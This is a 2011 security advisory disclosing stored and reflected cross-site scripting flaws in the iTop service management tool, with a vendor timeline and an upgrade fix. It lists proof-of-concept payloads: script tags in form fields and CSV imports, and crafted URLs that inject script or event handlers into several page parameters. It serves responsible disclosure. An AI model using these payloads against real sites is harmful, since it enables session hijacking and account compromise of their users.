iTop 1.1.181 Cross Site Scripting

`TC-SA-2011-02: Multiple web-vulnerabilities in iTop version 1.1.181  
  
Published: 2011/11/16  
Version 1.0  
  
Affected products:  
iTop version 1.1.181, 1.2.0-RC-282 (maybe earlier versions as well)  
http://sourceforge.net/projects/itop/  
  
References:   
CVE-2011-4275 - Multiple web-vulnerabilities in iTop  
TC-SA-2011-02 www.tele-consulting.com/advisories/TC-SA-2011-02.txt  
(used for updates)  
  
Summary:  
"IT Operations Portal: a complete open source, ITIL, web based   
service management tool including a fully customizable CMDB,   
a helpdesk system and a document management tool."  
Several common flaws could be found in iTop like reflected  
and stored XSS.  
  
  
Vulnerable Scripts:  
stored XSS:  
- almost every tested input field stored in database and in the  
html-content of the site.   
Especially in case data is reformatted using Javascript, the  
sanitisation in place   
seems to be overridden.  
  
reflected XSS:  
- almost every test input field where the value is reflected in  
servers output  
  
Examples:  
stored XSS:  
- add a company named "XSS <script>alert("Help Me")</script>"  
- add a database server named "XSS <script>alert("Help  
Me")</script>"  
- import a CSV-File where one cell contains "XSS <script>alert("Help  
Me")</script>"  
- copy&paste data (which does the same as CSV-import) using  
1;Test 1  
2;Test 2  
3;Test 3<script>alert("23746234243 Test")</script>"  
  
reflected XSS (un-authenticated):  
  
http://$domain/iTop/pages/UI.php?auth_user=admin"><script>alert("Help  
Me")</script><lala="&suggest_pwd=admin  
  
reflected XSS (authenticated):  
  
http://$domain/iTop/pages/UI.php?auth_user=admin"><script>alert("Help  
Me")</script><lala="&suggest_pwd=admin  
  
http://$domain/iTop/pages/UniversalSearch.php?c[menu]="<script>alert("Help  
Me")</script>"  
  
http://$domain/iTop/pages/UI.php?c%5bmenu%5d=60&class=Note&currentId=Searc  
hFormToAdd_document_list \  
&description="<script>alert("Help  
Me")</script>"&dosearch=1&name=Acunetix&open=1&operation=search \  
_form&org_id=3&status=draft&type=contract  
  
http://domain/iTop/pages/audit.php?category=%22%3Cscript%3Ealert%281%29%3C  
/script%3E%22&operation=errors&rule=1  
  
http://$domain/iTop/pages/UI.php?auth_user=%22%20onmouseover%3dprompt%2894  
9560%29%20bad%3d%22&suggest_pwd=test  
  
http://$domain/iTop/pages/UI.php?auth_user=admin&suggest_pwd=%22%20onmouse  
over%3dprompt%28972137%29%20bad%3d%22  
  
Possible solutions:  
- use version 1.2 final  
  
Disclosure Timeline:  
2011/08/09 vendor contacted via [email protected]  
2011/08/09 inital vendor response  
2011/09/06 first patch by the vendor  
2011/09/12 second patch by the vendor  
2011/11/16 public disclosure  
  
Credits:  
Tobias Glemser ([email protected])  
Tele-Consulting security networking training GmbH, Germany  
www.tele-consulting.com  
  
Disclaimer:  
All information is provided without warranty. The intent is to   
provide information to secure infrastructure and/or systems, not  
to be able to attack or damage. Therefore Tele-Consulting shall   
not be liable for any direct or indirect damages that might be   
caused by using this information.  
`